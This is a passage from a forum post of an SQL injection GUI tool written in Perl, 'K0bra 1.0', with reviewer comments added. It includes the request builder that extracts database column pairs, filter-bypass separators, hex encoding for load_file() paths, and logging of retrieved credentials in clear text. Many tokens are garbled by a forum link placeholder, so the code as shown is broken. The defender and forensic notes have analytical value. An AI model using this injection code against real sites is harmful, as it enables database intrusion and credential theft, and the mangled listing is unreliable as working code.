  462. $injection = toma($start.$concat.$end.$pass1."from".$pass1.$tabla.$pass1."limit".$pass1.$limit.",1".$pass2);
  463. if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
  # Every retrieved pair is written in clear text to logs/webs/<host>.txt.
  464. savefile($save.".txt","[$col1] : $1   [$col2] : $2");
  465. $duta1->insert("end",$1);
  466. $duta2->insert("end",$2);
  467. } else {
  # The loop stops at the first row that does not come back.
  468. last;
  469. }}
  470. } else {
  471. Win32::MsgBox("Error",0,"K0bra 1.0");
  472. }}}}
  473.  
  # Callback for "Hex": opens a small converter window with one entry and two
  # buttons. The nested subs paso1 / paso2 replace the entry's text with
  # encode(text) / decode(text). No network request is made here.
  # NOTE(review): the statement after each `get()` was partly lost to the forum's
  # link placeholder.
  474. sub per1 {
  475.  
  476. my $he = MainWindow->new();
  477. $he->title("Hex Converter (C) Doddy Hackman 2011");
  478. $he->geometry("420x70+20+20");
  479. $he->resizable(0,0);
  480. $he->Label(-text=>"Text : ",-font=>"Impact1")->place(-x=>20,-You are not allowed to view links. Register or Login=>20);
  481. my $cam = $he->Entry(-width=>30)->place(-You are not allowed to view links. Register or Login=>24,-x=>65);
  482. $he->Button(-text=>"Encode",-width=>10,-command=>\&paso1)->place(-You are not allowed to view links. Register or Login=>20,-x=>255);
  483. $he->Button(-text=>"Decode",-width=>10,-command=>\&paso2)->place(-You are not allowed to view links. Register or Login=>20,-x=>325);
  484.  
  485. sub paso1 {
  486.  
  487. my $caca = $cam->get();
  488. You are not allowed to view links. Register or Login $caca;
  489.  
  490. $cam->configure(-text=>encode($caca));
  491.  
  492. }
  493.  
  494. sub paso2 {
  495.  
  496. my $caca = $cam->get();
  497. You are not allowed to view links. Register or Login $caca;
  498.  
  499. $cam->configure(-text=>decode($caca));
  500.  
  501. }
  502. }
  503.  
  504.  
  # Callback for "ASCII": same layout as the hex converter window. The nested subs
  # paso3 / paso4 replace the entry's text with ascii(text) / ascii_de(text). No
  # network request is made here.
  # NOTE(review): the statement after each `get()` was partly lost to the forum's
  # link placeholder.
  505. sub per2 {
  506.  
  507. my $hexae = MainWindow->new();
  508. $hexae->title("Ascii Converter (C) Doddy Hackman 2011");
  509. $hexae->geometry("420x70+20+20");
  510. $hexae->resizable(0,0);
  511. $hexae->Label(-text=>"Text : ",-font=>"Impact1")->place(-x=>20,-You are not allowed to view links. Register or Login=>20);
  512. my $cama = $hexae->Entry(-width=>30)->place(-You are not allowed to view links. Register or Login=>24,-x=>65);
  513. $hexae->Button(-text=>"Encode",-width=>10,-command=>\&paso3)->place(-You are not allowed to view links. Register or Login=>20,-x=>255);
  514. $hexae->Button(-text=>"Decode",-width=>10,-command=>\&paso4)->place(-You are not allowed to view links. Register or Login=>20,-x=>325);
  515.  
  516.  
  517. sub paso3 {
  518.  
  519. my $caca = $cama->get();
  520. You are not allowed to view links. Register or Login $caca;
  521.  
  522. $cama->configure(-text=>ascii($caca));
  523.  
  524. }
  525.  
  526. sub paso4 {
  527.  
  528. my $caca = $cama->get();
  529. You are not allowed to view links. Register or Login $caca;
  530.  
  531. $cama->configure(-text=>ascii_de($caca));
  532.  
  533. }
  534.  
  535. }
  536.  
  # Callback for "Show Logs": derives the log file name from the host part of the
  # target URL (see comer) and passes "start logs/webs/<host>.txt" to a call whose
  # name was lost to the forum's link placeholder.
  # NOTE(review): presumably a shell invocation. If so, text from the target field
  # is interpolated into a command line without quoting or validation, so a URL
  # pasted from an untrusted source could run commands on the operator's own
  # machine. Confirm against an unmangled copy of the listing.
  537. sub china {
  538. my $de = $targetero->get;
  539. my $save = comer($de);
  540. my $file = $save.".txt";
  541. You are not allowed to view links. Register or Login("start logs/webs/$file");
  542. }
  543.  
  # Maps a style name to a pair of strings; callers assign the result to
  # ($pass1,$pass2) and use $pass1 between SQL keywords and $pass2 at the end of the
  # request. The three pairs are ("/**/","/*"), ("%20","%00") and, for any other
  # input, ("+","--").
  # Defender view: no request from this tool has a literal space between SQL
  # keywords, so log searches and filter rules should normalise these separators
  # before matching.
  # NOTE(review): the keyword before each pair was lost to the forum's link
  # placeholder.
  544. sub bypass {
  545. if ($_[0] eq "/*") { You are not allowed to view links. Register or Login ("/**/","/*"); }
  546. elsif ($_[0] eq "%20") { You are not allowed to view links. Register or Login ("%20","%00"); }
  547. else {You are not allowed to view links. Register or Login ("+","--");}}
  548.  
  # Takes a string in $_[0]; callers wrap the result in char(...), so it is used as
  # a comma-separated list of character codes.
  # NOTE(review): the function names on this line were lost to the forum's link
  # placeholder; only the ',' separator and the "U*" template remain visible.
  549. sub ascii {
  550. You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login ',',You are not allowed to view links. Register or Login "U*",$_[0];
  551. }
  552.  
  # Counterpart of ascii(), used by the ASCII converter's "Decode" button.
  # It assigns to $_[0], which aliases the caller's variable, so the caller's copy
  # is overwritten as well.
  # NOTE(review): most of the expression was lost to the forum's link placeholder;
  # what it computes cannot be confirmed from this listing.
  553. sub ascii_de {
  554. $_[0] = You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[], You are not allowed to view links. Register or Login { You are not allowed to view links. Register or Login } You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[,],$_[0];
  555. You are not allowed to view links. Register or Login $_[0];
  556. }
  557.  
  558.  
  # Builds a string that starts with "0x" and appends one "%x"-formatted piece per
  # loop iteration over $string. Used for the file path given to load_file() and by
  # the hex converter window.
  # $hex is a package variable, not a lexical, so it is shared across calls.
  # NOTE(review): the loop source, the formatting call and the last statement were
  # partly lost to the forum's link placeholder.
  559. sub encode {
  560. my $string = $_[0];
  561. $hex = '0x';
  562. for (You are not allowed to view links. Register or Login //,$string) {
  563. $hex .= You are not allowed to view links. Register or Login "%x", You are not allowed to view links. Register or Login;
  564. }
  565. You are not allowed to view links. Register or Login $hex;
  566. }
  567.  
  # Counterpart of encode(): strips a leading "0x" and processes the rest two
  # characters at a time (/../g).
  # The substitution runs on $_[0], which aliases the caller's variable, so the
  # caller's copy loses its "0x" prefix as well.
  # NOTE(review): the conversion calls were lost to the forum's link placeholder.
  568. sub decode {
  569. $_[0] =~ s/^0x//;
  570. $encode = You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[], You are not allowed to view links. Register or Login { You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login } $_[0] =~ /../g;
  571. You are not allowed to view links. Register or Login $encode;
  572. }
  573.  
  574.  
  # Single network primitive of the script: an HTTP GET of the URL in $_[0] through
  # the shared client $nave, taking the response body via ->content. The HTTP
  # status is not checked.
  # Defender view: every request is a GET, so the complete payload is in the URL
  # and is recorded by ordinary access logging, together with the fixed User-Agent
  # set on $nave.
  575. sub toma {
  576. You are not allowed to view links. Register or Login $nave->get($_[0])->content;
  577. }
  578.  
  # Appends $_[1] plus a newline to logs/webs/<$_[0]>, using the bareword handle
  # SAVE.
  # NOTE(review): the mode (">>") and the path are passed as one string, the
  # two-argument form, and no failure check is visible; whether a missing
  # logs/webs/ directory is reported cannot be confirmed from this listing. The
  # three call names were lost to the forum's link placeholder.
  # Forensics: these files collect everything the tool retrieved, in clear text
  # and named after the target host (see comer). That includes database account
  # names and password values, which makes them a primary artefact when examining
  # a machine on which the tool was run.
  579. sub savefile {
  580. You are not allowed to view links. Register or Login (SAVE,">>logs/webs/".$_[0]);
  581. You are not allowed to view links. Register or Login SAVE $_[1]."\n";
  582. You are not allowed to view links. Register or Login SAVE;
  583. }
  584.  
  # Splits the URL in $_[0] with uri_split() and works with $auth, the authority
  # part (host, plus port if given). Callers use the result as the stem of the log
  # file name.
  # NOTE(review): the keyword before `$auth` was lost to the forum's link
  # placeholder.
  585. sub comer {
  586. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  587. You are not allowed to view links. Register or Login $auth;
  588. }
  589.  
  590. # ¿ The End ?
  591.  
« Última modificación: Julio 17, 2011, 03:43:04 am por Sthefano02 »

 
